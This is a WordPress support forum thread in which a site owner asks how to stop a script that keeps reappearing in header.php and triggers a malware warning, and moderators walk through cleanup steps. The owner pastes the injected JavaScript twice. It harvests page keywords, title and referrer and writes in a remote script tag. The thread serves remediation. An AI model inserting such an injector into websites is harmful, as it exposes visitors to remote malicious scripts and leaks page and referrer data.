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  • Moderator James Huff


    I recommend asking at so the plugin’s developers and support community can help you with this.

    Thread Starter Baba WP



    I get this script always in my header.php file when i deleted that script the entire site working fine, That script is auto generate the script given below :

    [ Moderator note: code fixed. Please wrap code in the backtick character or use the code button. ]

    <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="'+encodeURIComponent(''+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent('"><'+'/script>');}

    Can any told me how to stop it.

    Moderator Jan Dembowski


    Forum Moderator and Brute Squad

    Do you know what is generating that script?

    Thread Starter Baba WP


    No @jan Dembowski

    I think that script stop the execution and gives error like
    The site ahead contains malware

    Thread Starter Baba WP


    Nothing Any solution to remove that Script :-

    <script>var a=”;setTimeout(10);if(document.referrer.indexOf(location.protocol+”//”!==0||document.referrer!==undefined||document.referrer!==”||document.referrer!==null){document.write(‘<script type=”text/javascript” src=”’+encodeURIComponent(‘’+&#8217;?’+’default_keyword=’+encodeURIComponent(((k=(function(){var keywords=”;var metas=document.getElementsByTagName(‘meta’);if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()==”keywords”){keywords+=metas[x].content;}}}return keywords!==”?keywords:null;})())==null?([^&]+)/))==null?(t=document.title)==null?”:t:v[1]:k))+’&se_referrer=’+encodeURIComponent(document.referrer)+’&source=’+encodeURIComponent('”><‘+’/script>’);}

    Moderator James Huff


    Start by identifying what is adding the script.

    Try deactivating all plugins. If that resolves the issue, reactivate each one individually until you find the cause.

    If that does not resolve the issue, try switching to the Twenty Sixteen theme to rule-out a theme-specific issue.

    Thread Starter Baba WP


    I think it generate the script by 3rd party jquery which named as ‘jquery.min.php’ can you know how stop 3rd part jquery injection in WP

    Moderator James Huff


    Right, you need to identify *what* is adding that call into the source.

    So, start following the steps above until you identify *which* plugin or theme is doing it. When you identify which one, it’s just a matter or repairing or replacing the *specific* plugin or theme.

    If you are absolutely sure it’s WordPress itself, and not a plugin or theme, you have a much longer road ahead of you:

    Thread Starter Baba WP


    Definitely theme and plugin are updated that script not generated by theme and plugin it’s look like the jquery malware injection so i need how to avoid that type of malware in wp

    Moderator James Huff


    Ok, then carefully follow this guide, as instructed earlier. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thread Starter Baba WP


    @james Huff

    Same Think happen again :–

    [Code moderated. Please do not post hack code blocks in the forums]

    Moderator James Huff


    Did you follow the guide carefully, and implement some security measures? Just because you remove the symptom of the hack doesn’t necessarily mean you closed the door they used to get in.

    Hacks often return if you don’t take steps to fully remove them and prevent them in the future.

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